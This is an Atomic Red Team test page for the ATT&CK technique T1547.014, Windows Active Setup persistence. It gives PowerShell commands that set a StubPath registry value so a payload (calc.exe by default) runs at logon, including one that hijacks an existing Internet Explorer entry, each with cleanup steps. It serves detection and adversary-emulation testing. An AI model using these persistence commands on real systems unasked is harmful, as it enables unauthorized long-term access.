# T1547.014 - Active Setup
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547/014)
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
Adversaries may abuse Active Setup by creating a key under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)
Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
## Atomic Tests
- [Atomic Test #1 - HKLM - Add atomic_test key to launch executable as part of user setup](#atomic-test-1---hklm---add-atomic_test-key-to-launch-executable-as-part-of-user-setup)
- [Atomic Test #2 - HKLM - Add malicious StubPath value to existing Active Setup Entry](#atomic-test-2---hklm---add-malicious-stubpath-value-to-existing-active-setup-entry)
- [Atomic Test #3 - HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number](#atomic-test-3---hklm---re-execute-internet-explorer-core-fonts-stubpath-payload-by-decreasing-version-number)
## Atomic Test #1 - HKLM - Add atomic_test key to launch executable as part of user setup
This test will create an "atomic_test" key under 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components' to launch calc by configuring an active setup executable and
forcing to run active setup using the "runonce.exe /AlternateShellStartup" command.
Without the "runonce.exe /AlternateShellStartup" command it would run during the next logon for each user.
Note: If you logout before running the cleanup command, you will be required to go through the OOBE (out-of-box experience) setup sequence to log back in.
The payload will only run once unless the cleanup command is run in between tests.
[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)
**Supported Platforms:** Windows
**auto_generated_guid:** deff4586-0517-49c2-981d-bbea24d48d71
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| payload | Payload to run once during login | string | C:\Windows\System32\calc.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components" -Name "atomic_test" -Force
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "(Default)" "ART TEST" -Force
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "StubPath" "#{payload}" -Force
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
```
#### Cleanup Commands:
```powershell
Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
```
## Atomic Test #2 - HKLM - Add malicious StubPath value to existing Active Setup Entry
This test will add a StubPath entry to the Active Setup native registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
Said key doesn't have a StubPath value by default, by adding one it will launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
Without the last command it will normally run on next user logon. Note: this test will only run once successfully if no cleanup command is run in between test.
**Supported Platforms:** Windows
**auto_generated_guid:** 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| payload | Payload to run once during login | string | C:\Windows\System32\calc.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
```
#### Cleanup Commands:
```powershell
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
```
## Atomic Test #3 - HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number
This test will decrease the version number of the 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for the current user,
which will force the StubPath payload (if set) to execute.
**Supported Platforms:** Windows
**auto_generated_guid:** 04d55cef-f283-40ba-ae2a-316bc3b5e78c
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
```